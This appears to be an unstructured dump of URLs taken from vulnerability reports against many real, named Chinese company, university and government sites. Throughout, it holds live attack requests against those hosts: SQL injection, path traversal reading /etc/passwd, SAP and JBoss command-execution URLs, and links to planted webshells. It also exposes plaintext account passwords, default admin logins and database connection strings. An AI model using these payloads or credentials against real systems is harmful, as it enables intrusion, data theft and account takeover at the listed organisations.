http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**//api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist http://**.**.**.**/framework/UserMainPageWin8.aspx http://**.**.**.**//fileroot//1ee55b67-8e9f-4aae-9769-c9767515f8b2.asp http://**.**.**.**/download/aiov7.exe http://**.**.**/login.jsp     http://**.**.**/login.jsp_ http://**.**.**/login.jsp_ http://**.**.**/login.jsp_ http://**.**.**/login.jsp_ http://**.**.**/login.jsp_ http://**.**.**/login.jsp_ http://**.**.**/login.jsp_ http://**.**.**/login.jsp_ http://**.**.**/login.jsp http://crm.9fbank.com/index.html http://crm.9fbank.com/crm/forgetPwd.html http://resume.shenzhenair.com/personedit_edit.action rKsSAAiQavn4hfpHo21:16542:0:99999:7 vj0:15916:0:99999:7 http://cloud.**.**.**.**/ http://cloud.**.**.**.**:58060/users http://cloud.**.**.**.**:58060/browse/dev/projects/weixin/05_source/trunk/superpark/04_parking_leasing/src/main/resources/conf/platform-conf.properties?r=595 http://cloud.**.**.**.**:18080/ https://cloud.**.**.**.**:58080/svn/ http://cloud.**.**.**.**/console/ http://sp.**.**.**.**:18002/ http://test.lxzq.com.cn/web/space/login.html https://www.hhycdai.com/question/tag?tagid=12 http://sjbwx.fuiou.com http://**.**.**.**/998.txt http://**.**.**.** http://**.**.**.** https://**.**.**.**/sionline/loginControler https://**.**.**.**/sionline/loginControler https://**.**.**.**/sionline/loginControler http://m.class.cn/user/register_ajax http://**.**.**.**/fblog/artview?ID=101&id=15594 http://**.**.**.**/index?m=ftheme&a=listbk&tpl=2&tid=214 http://**.**.**.**/fblog/index?ID=1850 http://**.**.**.**/index.php?mode=search&deep=4 http://**.**.**.**/bugs/wooyun-2015-0146520 http://weixin.jxlife.com.cn:80/jxlife/jsp/online/traffic_mobile_index_pc.jsp?Tab=1 http://bj.mangocity.com http://bj.mangocity.com www.acunetix-referrer.com http://**.**.**.**:80/manage http://**.**.**.**/hbzq/wz_info.jsp?infoid=19714 http://**.**.**.**/jj101.php?msn=0502&id=10 http://**.**.**.**:8070/ http://**.**.**.**:88/ http://**.**.**.**:8089/ http://**.**.**.**:8089/ http://**.**.**.**/ http://**.**.**.**:8000/ http://**.**.**.**:8070/ http://124.227.11.82/index.jsp http://oa.eastmoney.com/ http://mys8.super8.com.cn:81/pages/ http://mys8.super8.com.cn:81/Resource/ http://mys8.super8.com.cn:81/CoreResource/ http://mys8.super8.com.cn:81/attached/ http://mys8.super8.com.cn:81/pages/BS/SupplierAudit/SupplierAuditManage.aspx http://shenpi.yonyou.com http://shenpi.yonyou.com/jbossass/jbossass.jsp http://shenpi.yonyou.com/jbossass/jbossass.jsp?ppp=whoami http://interface.benlai.com/Web.config.bak www.***** m.benlai.com/BenlaiWap/service/searchA/ http://**.**.**.**:8086/wfvideohkust/newPlay.action?sid=SD070209749存在命令执行漏洞 http://**.**.**.**/bugs/wooyun-2015-0146520 http://js1.ooopic.com/ http://js1.ooopic.com/images/uploads/10162015/1285essio1444962522.php http://**.**.**.**/modules/download/index.php?cid=3 http://dp.cnmo.com/hit_for_dp.php?pro_id=1 http://ask.eol.cn/search.do?page=5&query=%25 http://**.**.**.**:8080/alliances/alliance.jsp?c_id=19 http://a.bdmob.cn/topicslist.php?area_id=26 http://a.bdmob.cn/topicslist.php?area_id=26 http://sqlmap.org http://test.99.com/ test.99.com/RegisterUser/isNewUser http://kaipiaoba.homelink.com.cn http://**.**.**.**:8070/ http://**.**.**.**:88/ http://**.**.**.**:8089/ http://**.**.**.**:8089/ http://**.**.**.**/ http://**.**.**.**:8000/ http://**.**.**.**:8070/ http://**.**.**.**/WebPortal/DriverInfo.aspx?cid=F973F6861D000905 http://**.**.**.**/WebPortal/DriverInfo.aspx?cid=F973F6861D000905 http://**.**.**.**/bugs/wooyun-2013-038943 http://m.mia.com/login?url=/cart http://**.**.**.**/portal_e2_page.php?button_num=e2&folder_id=4&cnt_id=421 http://**.**.**.**/portal_e2_page.php?button_num=e2&folder_id=4&cnt_id=421 http://cjgl.nipic.com/ http://www.xxsy.net/fangtan/104524*.html http://hr.jjshome.com/v/usercenter/register http://**.**.**.**/123/denglu.php http://**.**.**.**/123/admin/admin/upfiles/ice.php https://github.com/djh4230/MailWebLogin/blob/b8d0607c88536907374600f347e24682680812f9/MailLogin/src/com/mo9/CreditCenterCraw.java https://github.com/djh4230 https://mail.lianlian.com/owa/ http://58.62.185.148:88/seeyon/ http://58.62.185.148:88/seeyon/management/index.jsp http://**.**.**.**/aspnet_client/ http://**.**.**.**/ckfinder http://**.**.**.**/upload/ http://**.**.**.**/dl/images/ http://**.**.**.**/Log/ http://**.**.**.**/Control/ http://**.**.**.**/html/ http://**.**.**.**:8090/utr/utr/pro/pro-preview-pub!preview.action存在命令执行漏洞 http://106.120.158.40 http://106.120.158.40/UserAdd/DepartMentUserAdd.aspx?SelectType=1&SearchType=Proposer&Mode=dialog&TimeStamp=144496586841144089 https://www.name.com/ http://crm.zhenai.com/ http://weixin.zhenai.com/ http://crm.zhenai.com/crm.gz http://weixin.zhenai.com/resin-doc/viewfile/?file=index.jsp http://220.181.163.131:8010/ http://220.181.163.131:8010/ http://ufsdp.ufida.com/ http://ufsdp.ufida.com/UploadFile.aspx https://open.qbao.com/login.jsp https://open.qbao.com https://open.qbao.com/login.jsp http://ccmc.ecnu.edu.cn/admin/Default.aspx http://**.**.**.**:8090/ghjajcx/bacxAction!getSearchCase.action存在命令执行漏洞 https://fly.fuiou.com/pkgMng/queryScanPkg.sxf?FM= http://fly.fuiou.com,下载收件宝,更多优惠活动哟】 http://**.**.**.**/trq/detail?id=5973 http://**.**.**.**/hktc/content.aspx?id=20060612164107&lang=t http://**.**.**.**/index.php/Common/login https://github.com/enchanterhoo/aa/blob/fd1d283d8ef59c4dcb28ef9636373d354037fa2b/proj/config.py http://oa.hrsec.com.cn:89 http://**.**.**.**/ccr/People_All.aspx?Role=Core_Member http://**.**.**.**/com/People_All.aspx?Role=Administrative_Staff url:http://**.**.**.**/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://scm.ctruck.com.cn:50000//ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe http://58.243.186.29:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe http://114.80.86.106:8080/uddiexplorer/SearchPublicRegistries.jsp https://mail.cofco.com https://mail.cofco.com http://crm.emar.com/login/login.php http://cd.ydpic.sgcc.com.cn/Login_init.action http://cd.ydpic.sgcc.com.cn/Login_login.action http://10.0.5.8/ydcc/ https://10.0.5.122:7002/casserver/login?service= http://10.0.5.88:9888/baojia/ http://10.0.5.88:9888/console/ http://10.0.5.111:7001/pjbjbd/ http://10.0.5.111:7001/console/ jdbc:oracle:thin:@10.0.5.*:1521:*** jdbc:oracle:thin:@10.0.5.*:1521:pub*** jdbc:oracle:thin:@10.0.5.*:1521:pub*** jdbc:oracle:thin:@10.0.35.*:1521:devgbkdb http://10.0.5.76:8008/imageSys/ http://tzb.ecnu.edu.cn/news.asp?id=707 http://www.eoffice.ecnu.edu.cn/new_gonggao/model/mode_1.asp?ID=4025 http://www.qinzhu.ecnu.edu.cn/department/HeartRoom/HeartFront/content.aspx?id=%201452 http://www.120ask.com/user/myQuestion/ClassSaves http://202.46.33.211:8090/PatientList.aspx https://passport.meituan.com/account/retrievepassword http://eduadmin.openonline.com.cn/BasicSystem/Teaching/Tplan_Material_DetailNew.aspx?MaterialOwnerShipID=4&RecruitBatchID=4701&LevelID=0&SpecialityID=0&universitycode=10006&UniversityName= https://github.com/HikoQiu/wsdutil/blob/c0c5451c319038f837e0ecc7eb0ae3dea8716704/TestUtils/src/com/weisd/email/Test.java http://bj.feiren.com/ https://**.**.**.**/cch1989630/rangerEasyPay/blob/f44036d497d9d9b2ec9d5168d801b0628d1c0780/resources/jdbc.properties jdbc:mysql**.**.**.**:3308/busiunon_tst?useUnicode=true&characterEncoding=utf8 http://ppt.qiban365.com/action/server.php?action=login http://cwmxt.dev.class.cn/login_manage/index http://cwmxt.dev.class.cn/login_manage/check_member http://www.gyzq.com/gyzq/gyfc/lxwm/cpyc/jl_xyzp.jsp?infoId=1055746&curId=00010002001500080002&random=0.29002362582832575 http://www.gyzq.com/download/photo/20151016/1445002749904.jsp inurl:product_show.asp?lb_id= http://**.**.**.**/product_show.asp?lb_id=34 http://**.**.**.**/products_show.asp?lb_id=39 http://**.**.**.**/products_show.asp?lb_id=38 http://**.**.**.**/product_show.asp?lb_id=211 http://nczx.yonyou.com/SubModule/Login/index.aspx http://nczx.yonyou.com/SubModule/ProjectManage/RemoteTask.aspx?tasktype=2 http://nczx.yonyou.com/SubModule/ProjectManage/RemoteTaskAttachs/tmp/62360545liuni/x.aspx http://**.**.**.**/bugs/wooyun-2010-086973有感而发 http://**.**.**.**/NTRdrS_RegistInfo.aspx?BookRecno=900021568 http://**.**.**.**/NTRdrS_RegistInfo.aspx?BookRecno=900021568 http://fanyi.baidu.com/transpage?from=auto&to=zh&query=http%3A%2F%2Fdb.health.hsw.cn%2Fhospital%2F1609.shtml&source=url&ie=utf8&render=1&aldtype=16047 http://**.**.**.**/phpmyadmin http://union.baidu.com/userlogin.action http://union.baidu.com/userlogin.action?redirect:/xxoo http://union.baidu.com/userlogin.action redirect:/xxoo=1 http://union.baidu.com/userlogin.action redirect:/xxoo=-1 http://union.baidu.com/xxoo;jsessionid=6A2E51000AE93C7F2126AC067338B598.worker1 http://www.west.cn/domains/whois.asp查询 http://www.west.cn/services/domain/whoisinfo.asp?domain=lcy8.cc http://robotim.vmall.com/live800/downlog.jsp http://robotim.vmall.com/live800/downlog.jsp?path=/&fileName=/etc/passwd http://robotim.vmall.com/live800/downlog.jsp?path=/&fileName=/home/---xxxx-xx-/live800/WEB-INF/conf/dataSource.xml http://www.sdbe.gov.cn/2013/login/login.jsf?random=39 http://**.**.**.**/newsinfo.php?id=54 http://**.**.**.**/newsinfo.php?id=54 http://**.**.**.**/newsinfo.php?id=54 http://**.**.**.**/newsinfo.php?id=54 http://**.**.**.**/admin/login.php http://**.**.**.**////temp/16A25546352BF584B8EBAE1B97D12765/headPic/5f2e1491-e254-48de-becb-503c9315ff2f.jsp http://**.**.**.**/shop/hyzqindex/newDlym/ http://**.**.**.**/bugs/wooyun-2015-0144195 http://**.**.**.**/mainpage/PXXX/GG.aspx?ID=801&ShowMenu=0 http://**.**.**.**/mainpage/PXXX/GG.aspx?ID=801&ShowMenu=0 http://**.**.**.**/mainpage/PXXX/GG.aspx?ID=801&ShowMenu=0 http://**.**.**.**/web/mainpage/PXXX/GG.aspx?ID=801&ShowMenu=0 http://**.**.**.**/mainpage/PXXX/GG.aspx?ID=801&ShowMenu=0 http://113.98.225.143:8080//ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20/etc/passwd https://mail2.mindray.com http://**.**.**.**/ fe97:1b06%4 http://oa.cofco-keystone.com/login.aspx?ReturnUrl=%2f http://**.**.**.**/admin/Login.asp http://www.**.**.**.**/Images/cpks.asp http://oa.gyzq.com http://wap1.oa.gyzq.com:8009 http://**.**.**.**这个系统 http://**.**.**.**/ http://**.**.**.** http://**.**.**.** http://**.**.**.**呢 http://**.**.**.** http://**.**.**.** http://oa.ebscn.hk/names.nsf?Login&UserName=kencheung&Password=23445502&RedirectTo=/weboa/webpage.nsf http://oa.ebscn.hk/names.nsf?Login&UserName=gracefu&Password=Jd010806&RedirectTo=/weboa/webpage.nsf http://oa.ebscn.hk/names.nsf?Login&UserName=manleeku&Password=h26067181&RedirectTo=/weboa/webpage.nsf http://sq.shfft.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost:7001&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://180.153.239.170:8083 http://180.153.239.170:8083/admin/ index.php/portal/search/main/?keyword=12 http://aws.amazon.com/cn/) url:http://**.**.**.**/etjz.html http://**.**.**.**/hgjj/hgjjjjsj.jsp?lmid=8a8180251bfd9002011bfdd92ac10049 http://wenxue.hongxiu.com/diary/search.asp?pd=zz&keyword=1 http://**.**.**.**/taxi4mis/Area/nanjing/QyzxPage.aspx http://**.**.**.**/CMS/Logon.aspx http://12345678.blog.edu.cn/home.php?mod=space&uid=6288074&do=blog&id=706787 http://61.191.49.25:8081/wcc/index.jsp http://61.191.49.25:8081/upload/file/20151016231141/hr10.jsp jdbc:microsoft:sqlserver://127.0.0.1:1433;SelectMethod=Cursor;User=sa;Password=password;DatabaseName=csol_gjzq jdbc:oracle:thin:@192.168.0.207:1521:ora9i http://**.**.**.**/河南新乡市人口网,存在xss,但是后台是河南省人口卫生和生育网http://**.**.**.**/ http://www.youmiwan.com http://www3.hongxiu.com/hongxiu_read/bbs/s.aspx http://**.**.**.**/bugs/wooyun-2015-0147294 url:http://**.**.**.**/ http://**.**.**.**/jhmy/index.php http://www.jxxyxnfz.zjut.edu.cn/Front/SearchList.aspx?type= http://www.msexsgz.zjut.edu.cn/ShowNewsPageAction.do?newsID=622 http://www.ie.zjut.edu.cn/msc/index.php/Article/page?cid=18 http://www.ie.zjut.edu.cn/msc/index.php/Article/article2?cid=15 https://219.142.40.230/ http://119.40.53.11:8161/ http://**.**.**.**/bugs/wooyun-2015-0147294 http://**.**.**.**/jmcx/cs.htm http://**.**.**.**:81/JHMY/web/sz_etzl.jsp?sel=childno&no_name=321202080120050078&CX_Year=2005-11-25%27%20and*--&CX_Month=11&CX_Day=25 http://**.**.**.**:81/JHMY/web/sz_etzl.jsp?sel=childno&no_name=321202080120050078&CX_Year=2005-11-25%27%20and*--&CX_Month=11&CX_Day=25 http://**.**.**.** http://**.**.**.**/ http://**.**.**.** http://oa.yogi.com.cn/yyoa/index.jsp http://oa.yogi.com.cn/yyoa/assess/js/initDataAssess.jsp http://oa.yogi.com.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://oa.yogi.com.cn/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://182.254.132.12/微拍某网站 https://github.com/xingganfengxing/monitor https://github.com/xingganfengxing/monitor/blob/master/branches/src/main/java/com/letv/cdn/monitor/common/GlobalCacheInfo.java https://github.com/xingganfengxing/monitor/tree/master/branches/src/main/resources/conf https://github.com/xingganfengxing/monitor/blob/master/branches/src/main/resources/conf/online/application.properties https://github.com/xingganfengxing/monitor/blob/master/branches/src/main/resources/conf/dev_online/application.properties https://github.com/xingganfengxing/monitor/blob/master/branches/src/main/resources/conf/dev_online/application.properties https://github.com/xingganfengxing/monitor/blob/master/branches/src/main/resources/conf/dev_test/application.properties https://github.com/xingganfengxing/monitor/blob/master/branches/src/main/resources/conf/temp/application.properties https://github.com/xingganfengxing/monitor/blob/master/branches/src/main/resources/env.properties https://github.com/xingganfengxing/receiver https://github.com/xingganfengxing/receiver/tree/master/trunk https://github.com/xingganfengxing/receiver/blob/master/trunk/logparser/src/main/java/com/letvcloud/cdn/log/model/LogData.java https://github.com/xingganfengxing/openapi https://github.com/xingganfengxing/openapi/blob/master/src/main/resources/env.properties http://www.qu.cn/user.php?act=order_list http://**.**.**.**/admin/,打开后台网址,账号/密码admin/123456,然后进入后台: http://www.c3crm.com/site.zip http://**.**.**.**/Web_Org/Class_Info.aspx?courseid=5027 http://**.**.**.**/Web_Org/Class_Info.aspx?courseid=5027 http://**.**.**.**/Web_Org/Class_Info.aspx?courseid=5027 http://**.**.**.**/Web_Org/Class_Info.aspx?courseid=5027 http://**.**.**.**/Web_Org/Class_Info.aspx?courseid=5027 http://**.**.**.**/nhisportal/login/login.jsp,此处验证码可重用,可撞库。 http://wapiknow.baidu.com/index?rn=10&word=thisisatest&sp=1&lm=0&ssid=0&from=0&bd_page_type=1&uid=3FF8F74389FC6EE64CD539477F8143A5%3ASL%3D0%3ANR%3D50&pu=sz%40224_240%2Cos%40&init=middle&step=7&cifr=p_se_all ftp://**.**.**.**/ http://www.emaotai.cn//ProductUnSales.aspx?keywords=wooyun&tagIds=1_2 http://www.emaotai.cn/wapshop/productList.aspx?keyWord= http://wq.jd.com http://wq.jd.com/eval/GetEval?productId=1861100&guid=a36bd4e1-fd8a-4a40-b86c-10dde98ba778&_=1445063083523&callback=jsonpCBK2&g_tk=2036964968&g_ty=ls http://**.**.**.**/index/login_.action http://**.**.**.**/admin/Admin_Login.asp,存在弱口令账户,admin/123456,登入后台是管理员: http://**.**.**.**/ http://**.**.**.**/aldfdnd.aspx?file=../global.asax http://edu.qiban365.com/admin http://edu.qiban365.com/install http://**.**.**.** http://**.**.**.**/web/Teacher!one.action?tid=55存在命令执行漏洞 http://zmt.southmoney.com http://baiyin.southmoney.com baiyin.southmoney.com/phpcms/base.php http://**.**.**.** zabbix:http://zabbix.emar.com/zabbix ops:http://zabbix.emar.com/ops/index.php/login http://zabbix.emar.com/ops/uploads/b.php http://www1.gyzq.com.hk/ http://www1.gyzq.com.hk/service/s_tzymjh.aspx?MenuNo=1 http://www1.gyzq.com.hk/service/khdown1.aspx?a=440101&moduleno=1 http://www1.gyzq.com.hk/service/guide.aspx?ModuleNo=1 http://www1.gyzq.com.hk/service/about.aspx?id=1 http://www1.gyzq.com.hk/newfile/showmsg.aspx?ID=3&ModuleNo=1 http://www1.gyzq.com.hk/info/newslist.aspx?menuno=1 http://www1.gyzq.com.hk/info/newsdetail.aspx?newsID=1 http://www1.gyzq.com.hk/en/service/khdown1.aspx?a=440102&moduleno=1 http://www1.gyzq.com.hk/en/service/guide.aspx?ModuleNo=1 http://www1.gyzq.com.hk/en/service/about.aspx?id=1 http://www1.gyzq.com.hk/en/info/newslist.aspx?MenuNo=1 http://www.51tr.com/openlist.php?class=24 http://www.51tr.com/info.php http://life.ecnu.edu.cn/picture/article/159/18/5b/9022e6b64f5c9cd9662812bc6f09/6d142795-1f6f-4378-b86f-94703dfe7af3.xls http://ifi.huayiweibo.com/webroot/index.php/View/viewtopic/title/%E7%A7%BB%E6%A4%8D%E4%B8%ADIFI%E7%9A%84%E9%A2%84%E9%98%B2%E7%AD%96%E7%95%A5 http://59.44.43.239/ http://59.44.43.239/emp_pro/GetNewAction.do http://59.44.43.239/emp_pro/getEmployeeInformationAction.do http://**.**.**.**/yell/f4ck.asp密码qwe123!@#li http://jl.bnchina.com/manage/ http://cc.bnchina.com/manage/ https://**.**.**.**/ http://**.**.**.**/page/maint/login/Page.jsp?templateId=8&logintype=1&gopage=&message=55 http://www.jcdd.hc360.com/ http://**.**.**.**/webservice.php?pid=4&title=%CB%AE%B7%D1%B2%E9%D1%AF https://**.**.**.**/ci/data/php/consulation/queryConsulationByTitle_sqlite.php?title=a'union+select+1111,22222,sql,444444,555555+from+sqlite_master http://**.**.**.**/space.php?uid=1 http://**.**.**.**/do.php http://59.151.27.155/login/ http://**.**.**.**/ http://**.**.**.**/nybwebService/getEntList.jsp http://**.**.**.** http://**.**.**.**/news/detail.asp?news_id=1098 https://im.qbao.com/ http://**.**.**.**/show.aspx?mid=44 http://www.scrcoa.com/yyoa/common/js/menu/test.jsp?doType=101&S1=* http://**.**.**.**/admin88/admin_index.asp http://www.huayiyuan.com/ 